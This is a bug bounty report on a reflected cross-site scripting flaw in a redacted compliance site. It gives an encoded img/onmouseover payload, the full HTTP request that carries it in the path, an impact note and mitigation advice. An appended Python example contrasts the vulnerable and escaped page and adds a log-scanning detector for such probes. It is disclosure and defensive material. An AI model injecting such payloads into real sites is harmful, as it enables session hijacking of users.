Reflected Cross Site Scripting

  • Reported to Private
  • Reported by Haqtify
  • Medium (4.2)
  • $200
  • Published 3 years ago
  • No Likes

URL: 

Description:

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Payload:

%f6<img%20src%3dx%20onmouseover%3d"alert(1)"%20//%f6>

Steps To Reproduce:

1. Go to this URL.

http://compliance.redacted.com/app/upgrade//

2. Intercept the request and insert the XSS payload after the URL.

REQUEST:

GET /app/upgrade//yy%f6<img%20src%3dx%20onmouseover%3d"alert(1)"%20//%f6> HTTP/1.1
Host: compliance.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

3. XSS Executed.

POC:

[Screenshot: xss]

Impact:

Attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, hijack the user’s browser using malware, etc.

Mitigation:

Developers should implement robust input validation and output encoding consistently across the application to defend against XSS and other input validation attacks. The recommended input/output handling mechanisms are encoding, escaping, blacklisting and filtering of all special characters, e.g. <, >, ', ", etc.
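The following is an added example, not code from the report or the affected application. It models the reflected sink from the Steps To Reproduce (the request path echoed into an HTML page) in its vulnerable and output-encoded form, and adds a defender-side check that flags the same probe in access-log lines. The page template, the latin-1 handling of the %f6 byte and the sample log lines are assumptions/constructed.

```python
import re
from html import escape
from urllib.parse import unquote

# Request target from the report (straight quotes; the %f6 bytes are kept).
REPORTED_TARGET = '/app/upgrade//yy%f6<img%20src%3dx%20onmouseover%3d"alert(1)"%20//%f6>'

def decode_target(raw_target: str) -> str:
    """Percent-decode the request target the way the application sees it.
    Assumption: undecodable bytes such as %f6 are read as latin-1 rather than
    rejected, which is why they survive into the reflected page."""
    return unquote(raw_target, encoding="latin-1")

def not_found_page_vulnerable(target: str) -> str:
    """The sink in the report: the decoded path is reflected into HTML as-is."""
    return f"<p>Page {target} not found</p>"

def not_found_page_fixed(target: str) -> str:
    """Same page with HTML output encoding: <, >, &, \" and ' become entities,
    so the injected <img ...> renders as text instead of markup."""
    return f"<p>Page {escape(target, quote=True)} not found</p>"

def injected_tag_survives(html_out: str) -> bool:
    """Did an injected tag reach the markup? (Used to compare the two pages.)"""
    return "<img" in html_out.lower()

# Detection side: percent-decode request targets from access-log lines and flag
# ones carrying a tag start or an on*= event-handler attribute.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d')
TAG_OR_HANDLER_RE = re.compile(r"<\s*[a-z]|\bon[a-z]+\s*=", re.IGNORECASE)

def suspicious_targets(log_lines):
    """Return the decoded request targets that look like XSS probes."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and TAG_OR_HANDLER_RE.search(decode_target(m.group(1))):
            hits.append(decode_target(m.group(1)))
    return hits

# Constructed sample log lines (not from the report): one benign, one probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /app/upgrade// HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2021:10:00:07 +0000] "GET ' + REPORTED_TARGET + ' HTTP/1.1" 200 640',
]
```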